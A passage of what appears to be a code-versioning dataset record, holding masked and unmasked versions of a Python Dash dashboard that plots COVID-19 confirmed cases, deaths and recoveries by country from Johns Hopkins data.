True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n else:\n cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F',\n 'Recovered': '#009E73'}\n figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Date'], y=final_df.loc[final_df['Country_Region'] ==\n selected_country, selected_graph], marker_color=cols_dict[\n selected_graph])]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n selected_graph].max() * 1.1], 'automargin': True, 'showline': \n True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'},\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\n@app.callback(Output(component_id='global-box-1', component_property=\n 'figure'), [Input(component_id='global-dropdown', component_property=\n 'value')])\ndef global_update(select_global):\n if select_global == 'Global Cases Trend' or select_global is None:\n fig1000 = []\n anno = []\n for group, dataframe in cases_1000_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 1000 Cases'])\n trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di\n ['Confirmed'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np\n .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref':\n 'y', 'showarrow': False, 'text': list(di.loc[:,\n 'Country_Region'])[0], 'xanchor': 'right', 'yanchor':\n 'middle', 'align': 'center', 'font': {'size': 8, 'color':\n 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1,\n 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig1000.append(trace)\n anno.append(a)\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Cases Double Every 3 Days'], hovertemplate=\n '<b>Cases Double Every 3 Days</b>', showlegend=True))\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Cases Double Every 7 Days'], hovertemplate=\n '<b>Cases Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title':\n 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10\n (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log',\n 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black',\n 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': \n False}, title='Overall Confirmed Cases', xaxis={'title':\n 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[\n 'Days Since 1000 Cases'].max()], 'fixedrange': True,\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig1000, 'layout': layout_global}\n return fig_global\n elif select_global == 'Global Deaths Trend':\n fig100 = []\n anno = []\n for group, dataframe in deaths_100_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 100 Deaths'])\n trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di\n ['Deaths'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np\n .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y',\n 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'\n ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align':\n 'center', 'font': {'size': 8, 'color': 'black'},\n 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1,\n 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig100.append(trace)\n anno.append(a)\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Deaths Double Every 3 Days'], hovertemplate=\n '<b>Deaths Double Every 3 Days</b>', showlegend=True))\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Deaths Double Every 7 Days'], hovertemplate=\n '<b>Deaths Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Deaths',\n 'range': [np.log10(100), np.log10(cases_1000_start['Deaths'].\n max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': \n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, title='Overall Deaths',\n xaxis={'title': 'Days Since First 100 deaths', 'range': [0,\n deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':\n True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig100, 'layout': layout_global}\n return fig_global\n elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)':\n figmort = []\n anno = []\n m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)\n m = m.sort_values(by=['Mortality_Percent'], ascending=True\n ).reset_index()\n for i in range(len(m)):\n m1 = m.loc[i, 'Country_Region']\n m2 = m.loc[i, 'Mortality_Percent']\n trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2],\n y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)],\n orientation='h', textposition='auto', marker=dict(color=\n '#FFB000', opacity=0.6, line=dict(color=\n 'rgba(255,176,0, 1)', width=1)), hovertemplate=\n '<b>%{y}</b><br>' +\n '<br>Observed Case Mortaility Pct: %{text}&#37;<br>',\n showlegend=False)\n figmort.append(trace)\n layout_global = go.Layout(yaxis={'title': 'Country / Region',\n 'fixedrange': True, 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Observed Case - Mortality Ratio', xaxis={'title':\n '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [\n 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=750, hovermode='closest')\n fig_global = {'data': figmort, 'layout': layout_global}\n return fig_global\n elif select_global == 'Recoveries vs. Deaths By Country':\n figscat = []\n rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100)\n ].reset_index()\n for i in range(len(rc)):\n scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i,\n 'Recovered']], mode='markers+text', text=[rc.loc[i,\n 'Country_Region']], marker_color=colors_dict_global[rc.loc[\n i, 'Continent']], showlegend=False, marker=dict(size=12,\n line_width=1, opacity=0.75), hovertemplate=\n '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' +\n 'Deaths: %{x}<br>', textposition='bottom center', textfont=\n dict(size=10, color='rgba(0, 0, 0, 0.6)'))\n figscat.append(scat)\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(),\n 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25,\n line=dict(color='grey', width=1), text=[\n '# of Deaths = # of Recoveries'], hovertemplate=\n '<b># of Deaths = # of Recoveries</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Recoveries for Every Death',\n opacity=0.25, line=dict(color='green', width=3, dash='dash'),\n text=['2 Recoveries for Every Death'], hovertemplate=\n '<b>2 Recoveries for Every Death</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Deaths for Every Recovery',\n opacity=0.25, line=dict(color='firebrick', width=3, dash='dash'\n ), text=['2 Deaths for Every Recovery'], hovertemplate=\n '<b>2 Deaths for Every Recovery</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Recoveries',\n 'fixedrange': True, 'automargin': True, 'range': [np.log10(100),\n np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log',\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'dtick': 1, 'showline': True, 'mirror': False}, title=\n 'Recoveries vs. Deaths, By Country', xaxis={'title':\n 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100),\n np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth':\n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, height=750, hovermode='closest'\n )\n fig_global = {'data': figscat, 'layout': layout_global}\n return fig_global\n\n\n@app.callback([Output(component_id='main-dropdown-2', component_property=\n 'options'), Output(component_id='btext1', component_property='children'\n ), Output(component_id='subplot1', component_property='figure'), Output\n (component_id='btext2', component_property='children'), Output(\n component_id='subplot2', component_property='figure'), Output(\n component_id='btext3', component_property='children'), Output(\n component_id='subplot3', component_property='figure')], [Input(\n component_id='main-dropdown', component_property='value')])\ndef update_country(selected_country):\n if selected_country is None:\n selected_country = 'Canada'\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n else:\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n\n\n@app.callback(Output(component_id='box-1', component_property='figure'), [\n Input(component_id='main-dropdown', component_property='value'), Input(\n component_id='main-dropdown-2', component_property='value')])\ndef update_maingraph(selected_country, selected_graph):\n if selected_graph is None and selected_country is None:\n selected_country = 'Canada'\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph is None and selected_country is not None:\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph == 'Total and Daily Confirmed Cases':\n figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode=\n 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode=\n 'lines', fill='tozeroy')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n else:\n cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F',\n 'Recovered': '#009E73'}\n figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Date'], y=final_df.loc[final_df['Country_Region'] ==\n selected_country, selected_graph], marker_color=cols_dict[\n selected_graph])]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n selected_graph].max() * 1.1], 'automargin': True, 'showline': \n True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'},\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n\n\nif __name__ == '__main__':\n app.run_server()\n", "step-3": "<mask token>\nurls = [\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv'\n ,\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv'\n ,\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv'\n ]\nfinal_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv')\nfinal_df = calc_diff_country(final_df)\nfinal_df['Date'] = pd.to_datetime(final_df['Date'])\nfinal_df['Country_Region'] = final_df['Country_Region'].astype(str)\ncases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df\n ['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[\n 'Date']\ncases_1000_start = cases_1000_start.reset_index()\ncases_1000_start = cases_1000_start.rename(columns={'Date': 'Start_Date'})\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\ncases_1000_start = pd.merge(cases_1000_start, final_df, on=[\n 'Country_Region'], how='right')\ncases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date'])\ncases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date'])\ncases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()]\ncases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] -\n cases_1000_start['Start_Date']).dt.days\ndeaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df[\n 'Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[\n 'Date']\ndeaths_100_start = deaths_100_start.reset_index()\ndeaths_100_start = deaths_100_start.rename(columns={'Date': 'Start_Date'})\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\ndeaths_100_start = pd.merge(deaths_100_start, final_df, on=[\n 'Country_Region'], how='right')\ndeaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date'])\ndeaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date'])\ndeaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()]\ndeaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] -\n deaths_100_start['Start_Date']).dt.days\nmort = final_df.groupby(['Country_Region'])['Date'].max().reset_index()\nmort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left')\nmort['Mortality_Percent'] = mort['Deaths'] / mort['Confirmed'] * 100.0\ncolors_dict_global = {'Europe': '#1D6996', 'Asia': '#CC503E', 'Africa':\n '#94346E', 'North America': '#38A6A5', 'Middle East': '#EDAD08',\n 'South America': '#E17C05', 'Caribbean & Central America': '#0F8554',\n 'Oceania': '#73AF48'}\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\nserver = app.server\napp.layout = html.Div(children=[html.H2(children='COVID-19 Dashboard'),\n html.H4(children=\n 'A Basic Dashboard to Help Track the COVID-19 Pandemic'), html.Br(),\n html.H5(children='Global View'), html.P(children=\n 'The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. The Global View includes the following:'\n ), html.Div([html.Ul([html.Li([html.B(\n 'Cumulative Cases by Country Since First 1000 Cases: '),\n 'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis'\n ]), html.Li([html.B(\n 'Cumulative Cases by Country Since First 100 Deaths: '),\n 'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis'\n ]), html.Li([html.B(\n 'Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): '\n ),\n 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'\n ]), html.Li([html.B(\n 'Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: '\n ),\n 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'\n ])])], style={'font-size': 12}), html.Br(), dcc.Dropdown(id=\n 'global-dropdown', options=[{'label': y, 'value': y} for y in [\n 'Global Cases Trend', 'Global Deaths Trend',\n '% Mortality by Confirmed Cases (Top 20 Countries)',\n 'Recoveries vs. Deaths By Country']], placeholder=\n 'Pick Graphs From Here...'), dcc.Graph(id='global-box-1'), html.Br(),\n html.H5(children='Country View'), html.P(\n 'The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. The Country View includes the following:'\n ), html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B\n ('Confirmed: '),\n 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']),\n html.Li([html.B('Recovered: '),\n 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']),\n html.Li([html.B('Deaths: '),\n 'Cumulative Deaths from COVID-19 since January 22nd, 2020']), html.Li([\n html.B('Total and Daily Confirmed Cases: '),\n 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country'\n ])])]), dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value':\n x} for x in list(final_df.Country_Region.unique())], placeholder=\n 'Pick a Country From Here...'), dcc.Dropdown(id='main-dropdown-2',\n placeholder='Pick Graphs From Here...'), dcc.Graph(id='box-1'), html.\n Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id=\n 'btext1'), dcc.Graph(id='subplot1')], className='four columns', style={\n 'color': '#648FFF'}), html.Div([html.H6(children=\n 'Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id=\n 'subplot2')], className='four columns', style={'color': '#DC267F'}),\n html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id=\n 'btext3'), dcc.Graph(id='subplot3')], className='four columns', style={\n 'color': '#009E73', 'layout': 'right'})], className='row')])\n\n\n@app.callback(Output(component_id='global-box-1', component_property=\n 'figure'), [Input(component_id='global-dropdown', component_property=\n 'value')])\ndef global_update(select_global):\n if select_global == 'Global Cases Trend' or select_global is None:\n fig1000 = []\n anno = []\n for group, dataframe in cases_1000_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 1000 Cases'])\n trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di\n ['Confirmed'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np\n .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref':\n 'y', 'showarrow': False, 'text': list(di.loc[:,\n 'Country_Region'])[0], 'xanchor': 'right', 'yanchor':\n 'middle', 'align': 'center', 'font': {'size': 8, 'color':\n 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1,\n 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig1000.append(trace)\n anno.append(a)\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 *\n i)) for i 